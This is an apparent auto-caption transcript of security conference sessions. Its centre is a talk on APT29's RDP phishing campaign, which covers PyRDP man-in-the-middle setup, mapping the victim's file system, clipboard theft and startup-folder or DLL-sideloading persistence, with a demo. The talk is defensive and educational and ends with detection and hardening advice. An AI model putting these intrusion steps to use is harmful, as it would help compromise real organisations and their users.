be there that's the only way >> so to just tap into that one so you fully agree I think as well make certain that it's very clear what the goals are. So uh really set up achievable goals or in the distant but achievable and then measure that >> uh again fail fail fast. >> So just one other really quick thing because I know we're running out of time is um made as easy as possible. Build it into the process as much as possible. Put it in into the build pipeline. Put it into the deploy pipeline. And as Leander said, do MVPs as much as possible. So you're not going to be able to block everything right away. You're
not going to be able to give everybody a list of, you know, 100,000 vulnerabilities. It's not that's not useful. Figure out in small chunks, what's the thing we need to focus on? Maybe you do a scan and realize you've got one specific problem that keeps showing up across the company. Then just scan for that first and teach them and continue then to iterate on that. But if you put it into the process and the habits they already have and start small and then build on that in layers, you you'll get you'll figure out also the people who are really interested in security and really interested in tinkering and you can use those folks and their energy to help evangelize for
you. We um in previous companies we've had security guilds and I had actually somebody write a good portion of our automation who was not even part of the security team because it was somebody who just liked tinkering and kept talking about and asking really good questions about security in our little Slack guild chat and asked him a question one day and he fully automated the report that I was looking for. Done. So it you will find the people if you give them the opportunity to ask the questions and contribute. >> Well, thank you so much. We're a little bit over time. So please give a round of applause to our panelists. Uh if you if your question wasn't
answered, please feel free to ask because I see also there were some personal questions to uh Leandro and Cass. So yeah, please feel free to to come and ask them. Thank you. >> Thank you. >> Thank you all.
Finally.
Which one do you want?
Make sure I pronounce his surname correct. Okay.
Yeah, I'm fine. And I think
What I mean?
Uh we are getting started so please take your seat. eat.
Okay.
So I guess everyone here in the audience is a AP techniques lover hacker. So that's why you're here, right? Yes. Okay. So please uh welcome to the stage our next speaker Mickey Debbats. uh he's going to give you a talk on a remote desktop exploitation, a deep dive into a midnight blizzard's RDP fishing tactics. >> Please give him a round of applause.
>> Thank you. Um so for today we will dive into a bit how Midnight Blizzard also known as AP29 or Cozy Bear has been using remote desktop as a way to get into um other companies and into uh government organizations. Before we start, I first want to elaborate a bit more on why I chose this topic. I feel like coming from uh an offensive security background, I really enjoy probably as many of you here reading up on um a variety of TTPs used by APS. When I was researching this particular topic, um at the same time there was this really nice in-depth investigation uh from an attack by NSA. I don't know if anyone has saw it. It was on the
Chinese polytechnical university and you started reading it and the attack kind of went as follows. uh from what I can remember it was a bit a long time ago but they basically they started by hacking the edge routers of the university and then deployed custom firmware to have a man-in-the-middle position and to then inspect the traffic and redirect all uh web traffic to a custom zero day browser exploitation framework so they could serve the right users up with the right browser zero Now, when I'm reading this, I'm like, "Okay, super interesting, but this is not something I can like just set up for my next RA team." So, that was a bummer. But then you read articles about how
AP29 is using just a stupid simple RDP file to get initial access without having any issues like being blocked on the mail gateway or getting flagged as malware or anything like this. So it's very simple yet highly effective which for me was something like aha I can use this and that's why I chose this topic um because I it was just a super interesting technique being used by these adversaries. So for the agenda, first I want to dive in a bit into who am I? U bit on my background but not too much. Then we'll immediately go into the thread profile. Who is AP29? But also what defines an AP. Then we'll talk a bit about how the
timeline of the whole engagement went. How did they uh which preparations did they do? How did they set up the environment? And then what are the options for weaponizing RDP? I'll end this session with also a quick demonstration and some um advisory on how to detect, prevent and hunt for this particular attack. So who am I? My name is Mickey Debbatz. I'm currently the lead offensive security engineer at Verra, the NDR company. I'm also a hack the box ambassador for Belgium. I teach at Belgian college and I'm also the founder of BOPS red team specialized company in Belgium. So the thread profile I've been telling you Midnight Blizzard A29 all a bit the same thing. But before we define who is
Midnight Blizzard, why do they do what they do? We have to start with what is an AP. A stands for advanced persistent threat. Why advanced? It's because usually they have a full spectrum of intelligence gathering that they can rely on. Usually this comes hand inhand with being a state sponsored group. So it's not per se that the AP is also state sponsored but we do see a lot of APS that are state sponsored. So you do have the full capacity of um your country's intelligence operations behind you to operate and to to do your engagements which normally as a redeemer you don't really have. So that's already quite a difference. They're persistent. Think about maybe if you ever got uh or
somebody tried to scam you, they call you up. They will just try to have you to download any desk or team viewer or to just do like a quick task and the moment you struggle, they will just hang up and will go on with the next one. But they won't actually put effort into you. You're not special. Unfortunately, these APS, they are persistent. They have a target and they will do everything they can to obtain their targets and to do the actions on objectives to make sure that they have what they want. Sometimes these operations last for years and they don't really care if they have to wait two years to actually get what they want.
That's okay for them. Why are there why are they a threat? Well, if you have the capabilities and you have the intent, then you become quite dangerous. Usually, they also have the funds to have these super long operations and to do this full-time. So, working full-time for very niche targets. Some uh very known examples are AP44, also known as Sandworm. It's uh a Russian AP. They're part of the military intelligence service there. Uh they are known, for example, for uh a lot of wiper malware. So I think it was in 2018 um that they deployed some wiper malware and this is what kind of made them very known. Also Lazarus um allegedly North Korean uh known for the very yeah
expensive crypto heists. I think the biggest one in history of$ 1.5 billion US dollars which I think it was 20% or 25% that they were already successful in laundering and also a funny one uh NSA the equation group um it's also an AP actually uh one of their more recent campaigns allegedly was the one on the national time service center in China I don't know if anyone has read about the attack also a super interesting one where they basically they found an exploit in the SMS service of a foreign phone brand and they use this to basically spy on like the some managers or some highle profiles within this time service center organization and eventually they were caught but it was
an operation starting in 2022 and went on until somewhere late 2023. Now, why would you attack a time service center? There's a lot of reasons. There's a lot of critical infrastructure relying on being in sync. If you ever had to debug your kerros errors because you weren't in sync with a domain controller, you know the pain. So, imagine this on a national scale. So, there there's a variety of APS why they do what they do. It's really varies per group. It's not this one. This is not the AP I'm talking about. uh when I told at home, yeah, APS, they're like, since when are you into K-pop? But that's not what we're going to talk about today.
So, when we look at uh AP29, Cozy Bear, it's basically been attributed to the Russian foreign intelligence. How do we know this? I'll get back to that in a second, but they mainly target NATO countries, and it really varies which kind of target they have. It could be um some organization that's related to um a university. It could be a think tank. Could be an NGO. It could be basically anything. Their main goal is to obtain information and to obtain intelligence that could help Russia with anything economically uh in geopolitics on any level if they can even get like um some patents uh from which they can have like a an edge on certain in a
certain branch in business they will also go for it. So any organization that's linked to something that they can gather some from where they can gather intelligence and help benefit Russia. That's their goal. Now which TTPs do they use? A lot of supply chain compromise. I mean a lot. We saw a very big one. We'll get to that in a second. Some PowerShell fishing. They're big fan of big fans of fishing. And more and more cloud as well. Now from where you maybe know a29 cohy bear. It started back in 2014 where they attacked several US government institutions. Uh the White House was part of this also the Democratic Party and actually around the same time the Dutch intelligence they
were working together with the US intelligence and the Dutch intelligence they may or may not have so allegedly hacked one of the cameras in the main corridor of the office of uh AP29. So if you have vision on the corridor, you also know who's walking in and out. And they were sharing this information with the US and pretty quickly to identify that this was part of Russia's foreign foreign intelligence. After they did some more attacks, they hacked Denmark's national bank uh some they targeted some CO 19 vaccine development centers. Solar Winds, small company, not a big deal, maybe rings a bell. Um, still one of the biggest supply chain attacks in history. Um, this is how I imagine Solar
Winds feels whenever you mention them because I feel like the only thing that they're still known for is being the biggest supply chain attack in history. Microsoft in 2024. Um, very interesting case because they weren't after Microsoft's data or even after Microsoft's user data. They basically hacked Microsoft to just see, hey, what do you guys know about us? They were explicitly searching for stuff that Microsoft's uh threat intelligence team had on Cozy Bear. So, a very interesting attack. Um maybe a bit too much effort. I don't know. And even a bit after that, they also hacked Team Viewer. Team Viewer came out with a statement. This was somewhere late 2024 where they did admit that they were being hacked by
um AP29. However, they did mention that it was not the production environment but more the corporate environment. So that the another solar winds was basically out of the question. Then the third UA case number 11690. What happened? So on October 22 um in 2024, the Microsoft threat intelligence team, they saw that there was a massive fishing campaign going on and they quickly attributed this to Midnight Blizzard or Cozy Bear and it was a a high volume spear fishing campaign. They were seen sending over 1,000 fishing emails to people in over a 100 organizations. So governments, academia, think tanks, NGO, but even private sector companies, they first had to prepare this whole attack. So they were registering
domains, setting up their infrastructure, and just getting ready just a couple of months before they actually launched this attack. The fishing itself, it was um quite nice crafted fishing campaign. they had like um they were more relying on being Microsoft or pretending to be AWS and really using the zero trust hype saying like hey to be in order to comply with zero trust and to have a zero trust environment you just have to do this quick step uh have to connect to this RDP server and that's it. We'll d we'll dive a bit more into their uh lure in a second. Then the RDP files. So this fishing campaign, these fishing mails, they had one attachment RDP files. And why is
this brilliant? Basically on, if you look at the most modern mail gateways that are used, they do not block RDP files. They still don't. You can now look up Microsoft lookup what are the default like the attachments that are blocked by default. You won't find RDP in there. And then they were using this RDP connection to basically mount the file system of the user. And once you have access to the file system, there's a lot you can do. We'll see that later in the presentation. But one of the things you can do is deploy malware. So no fancy zero day technique, just a stupid RDP file mapping your file system and some scheduled task. Trent Micro also did a lot of
investigation on this whole attack and they identified the pattern uh that was used to register domains. So here we can see starting from the beginning of August up until the 20th of October. So a bit late if you want to start fishing on the 22nd but we don't judge. And you can see that they were quite yeah um relatively prepared. So starting from August they were averaging 10 domains a day and even back in September it was 13 domains a day that they were registering. These domains they were located in Australia, Ukraine, Estonia. Again in this list what you will find is a lot of NATO member countries which completely fits with the yeah methodology of how
AP29 operates. If you look at the domain names that they registered, what kind of impersonation they were trying to do? Maybe try to identify the targets again, NOS's and think tanks, military, IT, but even telecom and some private sector as well. So again, perfectly fitting in the whole approach of AP29. I'll give you guys a second to read the fishing email. Um, no, I'll uh I have a translation as well. Basically, what it comes down to is that uh this is only one of the campaigns that they used, but they were pretending to be Microsoft and AWS saying like, hey, this zero trusting, we really need to get this configured uh ASAP. So, we have attached your zero
trust configuration profile checker. Just doubleclick connect and it will do everything for you. Um that's what it boils down to. A very interesting thing with this fishing campaign is that they have used AI but they have used AI in a very special way. Basically they end the fishing email with saying by the way if you have any concerns if this is something is not working if something's weird. We're monitoring this with Amazon Q business. This is an official AI product that Amazon offers. But basically they're saying they're telling the user like if anything goes wrong don't tell anybody the AI will fix it like we will know because of AI. So it's a very interesting use of AI. I feel
like a lot of users they're warming up to AI. They're using it in a variety of products. So they are starting to know that AI can handle certain tasks. So to see it like you being used in a way like this where you're telling the user like hey don't worry if something go go goes wrong don't reach out to anyone AI will fix it and we will know it actually is not that bad of an idea the RDP itself so we have a lot going on even if it's a single file so you will download a file you can see it here and it will just look like a regular dp file they were using remote applications. So
when you would double click you wouldn't get the whole virtual session but you will just get a single application that is running on a remote uh server but you as a user would not know. If we look at the warning we get when connecting, you could see that your drives, your clipboard, basically everything that can be mounted to the remote server will be mounted. Would the user see this? Probably not. Why? Because as you can see here, this is something you have to explicitly like show. So, if you not click on show details, you would never know that all of this is being shared with the remote desktop server. I'm a bit in the way, but as you can see
here on the left side, they were for example impersonating Ukrainian government. So, they had to register the domain uv.cloud. And even on the other side, you can see that they had a valid certificate. So these RDP files, they were being signed with a let's encrypt it uh let's encrypt certificates to have a bit more uh reputation. So what are the different ways we can weaponize RDP? Well, the most popular one right now is Pyrd. What is PRDP? PI RDP is basically an open source tool that will give you a man-in-the-middle position with an RDP server. So the way it works is normally with a regular RDP setup, you would have a client and an RDP server. You connect
and you can then send mouse movements, you can send commands and you're you have a whole virtual interface uh in which you can connect uh in which you can control basically the remote server. What PyroP does, it's a Python tool that you can run on a Linux server or on a Linux machine. You can place it in the middle It will listen to anything coming from the client and forward this to uh the remote server. Now what is the beauty of PODP? It offers certain capabilities. It offers clipboard monitoring. You can crawl the file system. You can uh see even what the user has been doing. You can uh record the whole session and replay it
afterwards. And you can even do certificate cloning. And the most important one actually credential sync holding. So the the if you have been wondering okay nice attack you make the user connect with an RDP server but how do you get the right credentials to the user because when I want to remote desktop to any server or any host you have to enter valid credentials and this is the most powerful feature that pdp offers it doesn't matter what kind of credentials that you enter and the normally with modern RDP setups you only have to enter credentials because we have NLA enforced. So if you uh disable this feature, it will try to as with anything in Windows authenticate on its own and
if we can just yeah allow anything then immediately without prompting for credentials you are connected to this remote desktop server and that's the beauty of it all. You don't need to get valid credentials to the users. The user can just doubleclick enjoy and they're connected. The way they had this infrastructure set up also mapped out pretty nicely by um trend micro is they would use uh abundance of anomiz anonymization. So tour VPN proxy servers to connect with the 34 RDP backend servers that they had. So I've already been telling you these were thousands of emails that they were sending to people in over 100 of organizations. So you need to have quite the infrastructure. So we had we were
using 34 RDP backend servers and they had 193 um proxy servers. I think the amount of domains they had registered was about 200. Um so they were pretty well prepared. So in this case um to go back to the um previous image that would mean you had on the RDP server edge you had 34 servers um available and 193 different proxy servers to relay everything you're doing now. Okay. So what you can RDP that's fine right? Um well it depends if you share your file system what are the opportunities you have as an attacker. First of all the clipboard it's nice. Maybe they have their passwords already um copy pasted uh like copied because they were expecting to enter this can be
interesting. The file crawling super interesting. You might find um some interesting credential material on the hosts. But the file system mapping is the most important one for this whole attack because once you have the file system mapped, what can you do? You can deploy a link file on the victim's desktop. That could be nice. It's not very intrusive. You're it's not that wow. It's a link file. So you can also you can mess with the icon. There's a lot of things you can do to make it like more appeal uh more appealable to the user. It's very easy to do. Um, and it blends in. It depends. Uh, I'm a bit of a freak when it comes to my desktop. There
nothing touches my desktop, but I've seen some other desktops where for sure you would not see this link file. You can then create a shortcut to activate the the link file. Um, the only disadvantage here is mainly that this is not active until you reboot the machine. So, you do have a delayed execution, which I mean can be worth it. you just have to wait a bit longer and you do need the user to actually use the shortcut to activate the link file or you have to hope they manually double click the link file but this could be a bit trickier so either otherwise you would have to wait until they actually use the shortcut
the startup folder very interesting as well so you would just copy something from your RDP server to the file system that was mounted to the start folder of any user it's very easy to just create a PowerShell script that will go over all the user folders and try to put something in every user start folder. It's reliable. You have a very reliable execution. Next startup, you will immediately get a connection. You don't need any interaction. You're not waiting for the user to do anything except for yeah rebooting. But normally, eventually they will do this. The problem with this is that a lot of EDRs these days do easily flag something coming up in your start folder. So that might be an issue.
We have sideloading. Um, also very interesting. You place a DL in a location that you will know that a program will use it and then you just have to wait for the user to use the application. The application will call the will load the DL. Your payloads being executed. Very stealthy. Bypasses uh certain constraints such as uh application whitelisting if they have app locker or um WDAC configured. very nice to have a sideloading in this case. The problem is let's say um you go for the sideloading approach. I can tell you there's no such thing that's more frustrating than when you have your team's sideloadads payloads ready to use and then you're on the host system and
you find out that they're using WebEx. That's terrible. So you do need to have actually certainty that they're using the the application that you want to target for your sideloading. App domain injection also a nice one. Um very stealthy also bypasses application whitelisting. This is basically the sideloading version uh that you have inn net applications. It's a bit more complex and again you want to target something that you know that they for sure will have on their system. Some honorable mentions. So data exfiltration again this file crawling that's running in the background is super interesting because you will get a lot of configuration files that might have passwords. Maybe the user has a passwords.xlsx on his desktop. Uh there might be very
valuable information coming from your data excfiltration and there were in the past also some rce techniques coming from remote desktop. Now the whole thing that we've been mentioning maybe you're like hey this sounds familiar. Well it was published a while ago by um black hills information security. They did a very nice write up on how it works. Um their process in going setting it going through the setup and uh why they wanted yeah you why they wanted to use RDP for initial access. So then you're thinking maybe yeah but you said an AP they should be advanced. Well sometimes it's the simple things that work. A very interesting thing uh if you look at the whole RDP being used
first by Black Hills information security and then by an AP lot of APS they're also actively monitoring what's going on in the red team pentesting space and they might even use techniques from what they see in blog posts from trainings and these kind of things. It's it works both ways. As a red team you're also going to steal some techniques that an AP uses and they do the same. So that doesn't make a difference. Um it seems like fair play. I feel like the the whole thing that you should like wonder or that you should ask yourself in the whole because this is a whole debate, right? Um do we need to keep publishing writeups on these
kind of things because for example if let's say Black Hills information security wouldn't have published their blog post on RDP being used for initial access maybe they wouldn't have used this. maybe a29 they would have never figured out how to use RDP for um mounting the file the file system and then deploying malware but I mean I'm not here to um fire up this whole infosc debate that's been going on for years but I just want if if this is something that bothers you that you're looking at and then you're thinking like ah these damn red teamers why do they have to share all this tradecraftraft would you rather that you know how this works and you know how you
can defend against it or would you rather that you don't even know that this is an like something that exists uh RDP man in the middle kind of attack? I feel like the ladder is much more worse if you think about it. So yeah, I have a demo. Um I have it both on video and live. So we pray to the live gods uh to the live demo gods. If that doesn't work, I'll have to fall back to um the video.
So it should be nice.
So on the right side I will have my uh pyrodp man in the middle listening. And here on the left side, I have my uh my victim machine. So I have this RDP profile that I sent to my client. Um it's not signed. I'm uh too poor to afford the code signing certificates. So uh I don't have the funds that an AP has unfortunately. But you can see that I also have some some files in my downloads folder. Um and I have a clean startup folder as well. So normally I don't have anything to worry about and then it's as simple as just opening this uh profile. Now you do get like this banner u that are you sure you want
to establish this remote connection. The thing is this is not an abnormal banner. Um you don't get this from mark of the web or anything else. Even if let's say to an internal host you would connect for the first time you could get a banner like this. So this doesn't basically this doesn't necessarily say anything. You could go for the show details like I mentioned but no user is going to do that. Why would you want to show things that you don't understand anyways? So you just press connect. Now a lot of stuff is happening here. Um in this case I placed um a small distraction. So of course we want to know if your AWS storage is correctly
configured. So please do wait until it has done um its all of its checks and you can see on the right side that the whole file system is being crawled and downloaded to the RDP server. Now let's say I was a prepared user I wanted to I know a bit how it works how to remote do to another machine. So I knew that I might had to get my password ready. So I copy paste I copy paste I copy it to my clipboard and you could see here the clipboard is also being monitored and the attacker would also have my password. So at this point I'm not sure why I'm doing this. I will close this because
I've been doing it for way too long. 40%. So this stops. And if we would check the file system, you can see on the evil RDP server, we have the whole file system um a lot of anti ransomware from elastic. It doesn't have everything now because I aborted it uh a bit quickly, but you can see it doesn't take long for the malware to appear in my startup folder. So that's how easy it is. Even if I wouldn't have waited until 40%, the moment you connect, you can easily configure a scheduled task that runs when you log in. And when you log in, it's just as easy as copy this file to this directory. You have their file
system mapped. So you just parse all users to their startup folder and see if you can write something to their startup folder. That's how easy it is.
So, of course, you don't want this to happen to you. Now, the odds of you being targeted tomorrow by APT29 are quite low. I wouldn't say maybe unlikely, but quite low. So, don't uh lose any sleep on this. But what you can do, you can block RDP files on your mail gateway. Um, just a simple thing to do. I normally you don't expect your users to be uh receiving RDP files in their inbox. You can also block users that shouldn't usually don't come into contact with a remote desktop server to just block RDP files for them. Even better, you can um use the Windows host firewall to not allow MSDSC, so the RDP process to make any connections to the
internet. Maybe you are using in uh you may maybe you are using RDP but usually you're only RDPing to um other service in your network. So you can just say this process shouldn't make contact to the internet. Even better is to use GPO to your advantage and don't allow users to share things like their clipboard, their file system with remote desktop servers. And of course if they steal credentials, I mean you should have MFA in place. uh even yeah um conditional access policies also a nice um query to hunt um if you're really going to lose sleep over this then you can be um a bit yeah have a bit of peace of mind to know
that you didn't get any mails with RDP attachments from a Russian military intelligence group. Um so and even if you see something in from this query maybe it was just it like it could have actually been it. Now detect um this is also something interesting to um to investigate. So there are a few things that you can actually do to detect this uh when it's going on. First of all um yeah if you work at an NDR company the first thing you're going to do is just launch the attack against your NDR product. And one of the early signs was smash and grab detection. I don't know if there's any better name for it, but the fact that
you're connecting to a site that you've never seen before and suddenly you're um uploading more data than you're receiving could be quite a suspicious behavioral thing. So that's already you can see here um data normally send nothing and suddenly I'm sending uh 207 megabytes and it's not here yet. uh it's not in this screenshot but I think it was even like 25% of the data downloaded uh the data downloaded was 25% of the data sent so that's already something quite suspicious another interesting avenue is the U J 3 and 4 who knows what JA3 and 4 is some enthusiasts so whenever you set up a connection um you will probably use an encrypted channel even RD RDP. This is done over
when you connect with RDP. This is done over an encrypted channel using TLS. Now what is JA3 and uh JA4? You basically can fingerprint every TLS connection. So me as a user, I will have a specific set of ciphers that I use and some other actions that I do when I connect over TLS, but the server will do the same. And this match of your behavior and which ciphers you accept and which ciphers you offer can be fingerprinted. JA4 goes a bit more in depth but basically this SSL finger fingerprinting is a technique that's being used more and more to identify some services and um it might be a bit small but of course when I connect to an
legitimate Windows server the TLS tech will be different uh compared to that of yeah the Python SSL library. So just purely this you can already check and see that something weird is going on. So in the left side here I have my connection to PI RDP and on the right side I have my connection to the actual RDP server and you can see yeah maybe you cannot see but you will have to find out later in the slides that these hashes of the fingerprints are um are different and another very interesting one um I actually wasn't really aware of this in the past but if you perform some decryption um you can actually find out
that in the packets that you sent to the RDP server is also your um your keyboard layout. And this is something that's very tricky to get right. So let's say you're a Russian AP and you want to send something to we saw the targets Australia, Ukraine, um like every NATO member country, you cannot set up an infrastructure that mimics every keyboard layout. And maybe you even just don't think about this and you will leave your keyboard layout um in just the I don't know what the standard Russian keyboard is but the default one. What you can see is if you perform some decryption um it's the field highlighted in blue you can find in your decrypted RDP
packets the codes that's yeah maps to a certain keyboard layout. So let's say that one of your users is um connecting to a server and suddenly instead of using the normal Belgian keyboard layouts, they're using um some yeah cerillic alphabet keyboard layouts. That might be a strong indicator that something is wrong. Um that's all. Um I hope it was interesting. Um I have also the QR codes. Before I end this talk, uh I really want to give a shout out to the cert the Ukrainian C. They this is only this was only one attack that they encountered. Um like a few weeks ago there was a conference dedicated to nation statecraft where everything was TP red so I cannot talk too much about
it but they have been bombarded with one attack after the other and only to just only to cover this attack and to see where have we been hit. Did they deploy malware? I feel like that would be the normal socks nightmare already and this is just one of many. So, big shout out to those guys and also for the writeups that they made on the attack and uh yeah, I hope you guys enjoyed the talk. >> Awesome. Uh we have two minutes for questions. So, does anyone have any questions? >> Yes. Uh you were talking about that they had RDP files that were signed. Uh you said it costs a lot of money. Is it is it not
a less encrypted type certificate? >> Um it it it really depends. Like you can get a code signing certificate for um like €8. So it's not super expensive. Usually they won't play fair and pay for their code signing certificate even and they will use something that was leaked or they found during a previous hack. Um, it's not super expensive, but it's just too expensive for a talk. That's what it comes down to. >> Um, one more question. No, we're good. Okay, perfect. Well, thank you so much and and we are back. There is still another talk in tech track and we're back in 10 minutes for the closing keynote.
How do you um
keep protection?
Very interesting. I know you can start applications without having to be, hey, you were connected to a remote computer screen.
Yeah.
I mean Good thing is
this is
I've never
Okay.
You have to go.
My details.
That's it. That's it.
Now I'm
name.
How many
How you doing?
You do it uh like this or like Yeah. Yeah. Perfect.
your favorite
All right.
relax.
Yeah. Yeah. Yeah.
Congratulations.
far.
>> That was
Final one.
The final one. Everything.
Don't fall.
What's that?
So
Okay. Come on.
Yeah. Ready? They do.
You're not
Yeah,
you're not going to
be nice.
Yeah. Yeah. Yeah.
Every year I'm like
Get ready.
>> Awesome. Okay, let's get started. So, please take your seat if you want to or if you I see a lot of people still at the bar. So, if you want to just enjoy the drink and listen to our last presentation of the day, our closing a keynote which is kind of again about the kids and how can we save them from the career in cyber crime. So, yeah, if you have kids, it's very uh relevant for you if you're planning to. So, please uh welcome Fergus. Okay, through the stage. >> Thank you very much. >> Let's give him a round of applause. >> Oh, applause. >> If you don't applause at the end, I know
it's been a disaster. So, it's downhill from here. Uh it's really really great to be back at Bides. Um actually, in the uh advert for this talk, it said I was a sector specialist. Uh that is a total lie. So, uh I have no credibility to stand up here, particularly at Bsides. So I'm not technical. I'm not a hacker. I've never worked in cyber security. So actually even like half of you guys. Yeah. No, but like uh we do a lot of presentations. I always say when I come to Bides anywhere in the world, it's the toughest crowd uh because you guys are the real real hackers in the world. So uh thank you for the invitation and it's
a real uh privilege and pleasure to be here. I bribed a lot of people at the bar with some stickers uh to say that if you want to if you want to talk about saving kids from cyber crime um come and come and listen to our little chat. I'm going to spend uh about 30 35 minutes talking to you about what myself and my co-founder Dan Deer who comes from Amsterdam uh what we've been doing for the last couple of years. Um we met because he asked me if I wanted to invest in cyber security. Don has been in cyber security for 25 years, set up and sold a bunch of different businesses. And so I came over to learn
and I walked into a room with six hackers. I think Hugo was actually on the phone. And three hours later I walked out terrified. And I got on a plane from Amsterdam to Zurich that afternoon. And it's actually one of the most beautiful flights you can take because you fly over the Alps and everyone's got their noses against the window and it's like oh toblone but in 5D and there was just me sitting on the other side of the plane filled with parental paranoia just riding this THING GOING [ __ ] WHAT'S HAPPENING TO THE kids why are they being groomed by the bad guys off gaming platforms and why is no one doing anything about it. I landed, I
called Darn, and I said, "I think we're going to go from friends to co-founders because I think we need to solve the problem." And that's the mission that we're on. Our mission is to create a generation of ethical hackers to make the world safer. And the reason why we're doing that are reasons that you guys will know about. So, uh, just this year alone, the global cost of cyber crime is predicted to be $10.5 trillion. $10.5 trillion. That's the global cost of CO according to the IMF. In two years time, they think it's going to be $24 trillion. That seems like an impossible number. If that is true, that is the GDP of the United States. And obviously,
last year it was $8 trillion. So, we know that the rise of cyber crime is a real problem. But I think what's really really scary is who are the bad guys? And of course, we all talk about Iran and Russia and and China and uh North Korea and all of that is true. And we also talk about the organized cyber gangs out of South America, South Asia, Eastern Europe, and Africa. Also, that is true. But what the data shows is that the vast majority of the people committing the crime are children. In fact, Europole published a report where they interviewed 14,000 teenagers across Europe and the UK. 69% of them have committed a cyber crime
or a gross cyber misdemeanor. 69%. The FBI who sit on our advisory board will tell you that the average age of someone that they arrest for serious crime is 37 years old. But the average age of someone they arrest for cyber crime is 19 years old. And in fact, if you just look at the media, you can see that it's a really big social issue. None of these stories are new to you guys, but for example, the guy who was arrested as the head of Lapsis, I'm not sure anyone really believes he was the head of Lapsis, was an 18-year-old autistic kid from Oxford in the UK. The Marks and Spencers and Co-op and Harrods, which are the biggest
retailers in the UK, they were hacked about four months ago. They cost a billion dollars of enterprise value. The four people arrested for that hack by the National Crime Agency was 17 years old, 19 years old, and two 20 year olds. The uh hack on uh the uh government ministries in the Hague just a month ago was run by two Dutch teenagers who were recruited by Russian intelligence off uh off Telegram. So what you're seeing is the age profile of the cyber criminal gangs today is increasingly young. It is thought that Scattered Spider are also behind the Jaguar Land Rover hack that has cost Jaguar Land Rover $2.2 billion. It's put 140 businesses in uh
liquidation and the UK government has now bailed out a foreignowned company try to put that together uh for 1.5 billion pounds. So the impact of this youth cyber crime is really really for real and it's a problem that we are trying to understand where it comes from and what the entry point is. We feel like this generation is at an ethical fork in the road. They're either going to be a real liability to society, but they could also be a real asset. And so when we look into understanding who they are, what's super clear is that every hacker is a gamer. In fact, I sat with uh Jeff Man, whom some of you may know, but he's the
founder of the NSA's red teaming. And Jeff in the US is one of the godfathers of Bides. He's an amazing guy. And I said, "Well, Jeff, you must be super technical, right? Because you know, you're like one of the old school hackers." And he was like, "No, I'm not technical. Of course, you need some technical skills, but they change every year. What you need is puzzle logic. You need pattern identification. You need to be able to see things other people don't see and solve things in a way that other people can't solve. And the way he learned to do that was sitting with his dad in probably, sorry Jeff, the 1960s doing wooden puzzles and metal puzzles
and playing chess and playing turn-based games and developing his puzzle logic that way. And in his mind, every single hacker is a gamer. And actually, you just have to go back to history. If you look in the 1930s during the Second World War, Winston Churchill from the UK, he saw two ways to try to win the war. Get the Americans involved. We kind of might regret that at the moment, but get the Americans involved. And the second way was to solve the Enigma code. And the Enigma code was the telecoms system, signal system the Germans were using to have the Ubot to attack the merchant navy ships, which is all the supplies around the ocean. So what
Churchill did is he went to Alan Turing who we were with his grandson actually two nights ago. We went to Alan Turing who was an autistic mathematician and said Alan we need corkcrew minds. We need the best corkcrew minds in our country who think differently who think atypically some would say diversely to solve problems. So what he did is he developed a cryptographic puzzle and he put that cryptographic puzzle in the newspaper and he said if you can solve this puzzle you get an interview at Bletchley Park and the puzzles were solved and the people were hired were predominantly neurodeiverse autistic Polish women and this was the crew that he put together to crack the Enigma
code. So there is history to show that if you understand the gaming mindset and how people game and how people think and how people solve puzzles and you look for those corkcrew minds, the people who think differently, the atypicals, then you can identify what a future hacker really looks like. And what that means today is that the next wave of hackers and cyber talent are gamers. I want to show you this kid. He's one of the founders of our youth community. Uh Dylan uh when he was 12 years old during COVID, his high school wouldn't let him use um uh Teams. So all of their friends were at home on their own going crazy. There was no social interaction. We all
have a bit of PTSD off the back of that. And so what Dylan decided to do was to hack Microsoft. They're not a sponsor, are they? That's always a bit embarrassing if they're a sponsor. No, they're not on. They should be though. Uh we should call them. So, uh, he hacked Microsoft and he opened up Teams for 2 and a half weeks for his school friends so that they could all socialize. It actually spread like wildfire across the US. All the teenagers in all of the high schools got hold of it and started using it. He got pulled by the FBI after two and a half weeks and they referred the case to Microsoft and they said, "What do you
want to do? You want us to prosecute this kid?" But to their great credit, they didn't prosecute him. They gave him a job. And last year at um Black Hat in in Vegas, Dylan won bug bounty of the year at Microsoft. We think he earned about $300,000 last year from Microsoft legitimately for a specialist program just for his talent and abilities. And he developed all of his talent and abilities by learning how to hack computer games. So there is a whole wave of gamers out there who have got talent. And in fact, there are 3.2 billion gamers in the planet. Just to put that into perspective, there are 3.5 billion football fans, 93% of Gen Z game. And
when you look at how they spend their time every day, what you'll see is that they spend 30 minutes a day on Snapchat, 50 minutes a day on Tik Tok, 114 minutes a day gaming. In fact, the Times in the UK published a report last month that said British male teenagers are spending more time gaming than they are doing their homework. And of course, what happens is the school thinks a corkcrew minded neurodeiverse teenager who is spending all their time gaming, they think they've checked out of school and they're dumb. But the reality is they're smarter than their computer science teacher. They know more than their math teacher. They find it completely boring and pointless. And the parents, they
think that Dylan is just wasting his time playing computer games in his bedroom. Why are you playing Fortnite, Dylan? But what they don't understand is like a live laboratory for skills development. And so this talent is unidentified and unseen and missed. Unfortunately, the only guys who have worked out about this rich vein of talent are the bad guys. The bad guys have identified that they can identify young kids who are developing their skills from the age of 11 years old and they can recruit them as hackers into their community. In fact, in 2024, 132,000 kids were groomed by cyber gangs through gaming platforms. It's a 30% year-on-year spike. And that's because the kids are motivated. And the use case
would be my son Rafa. Rafa is 11 years old and he plays Roblox like 79 million other kids a day. Just to put that in perspective, the most watched bit of TV in the world that happens once a year is the Super Bowl. This is four hours of painful, patient, it's a hard watch, and there's 120 million people watching it. So, one and a half days of Roblox, not even a day of Minecraft, which is 140 million people a day. And so, what you take my son Rafa, he plays Roblox. He'll come up to me and go, "Dad, can I have 10 Robux to buy some stuff in the game?" And because I'm a perfect parent like
everyone else here, I will say no. And what he will do is he'll find a way. YouTube will teach him how to hack hack the game. Google will give him the tools. The Discord will find him a community. And he'll put his skills to work. And when he starts hacking the games and securing what he wants, he starts to get noticed. And if he's really good, he starts to develop modification software. And if I asked a question here, which I did to 300 kids in Manchester on Tuesday, how many of you create modification software? It was over 50% of the room. So when they do that, they're getting on the radar. They're getting identified by the gangs.
It's like a cyber criminal GitHub and they can see the talent of these kids. And then what happens is they approach Rafa and they go, "Hey Rafa, you want to earn some Bitcoin? Why don't you come over to this Discord community and we'll put it together?" We have a uh 12-year-old kid, or he was 12. He hacked Roblox and in one day he stole a bunch of tokens. It hadn't been released. He sold them on the secondary market. At 12 years old, he made $35,000 in a day. The next day he put that all into Bitcoin and 18 months later he had a wallet with $400,000 in it. And his parents only He's nodding. He's like, "I
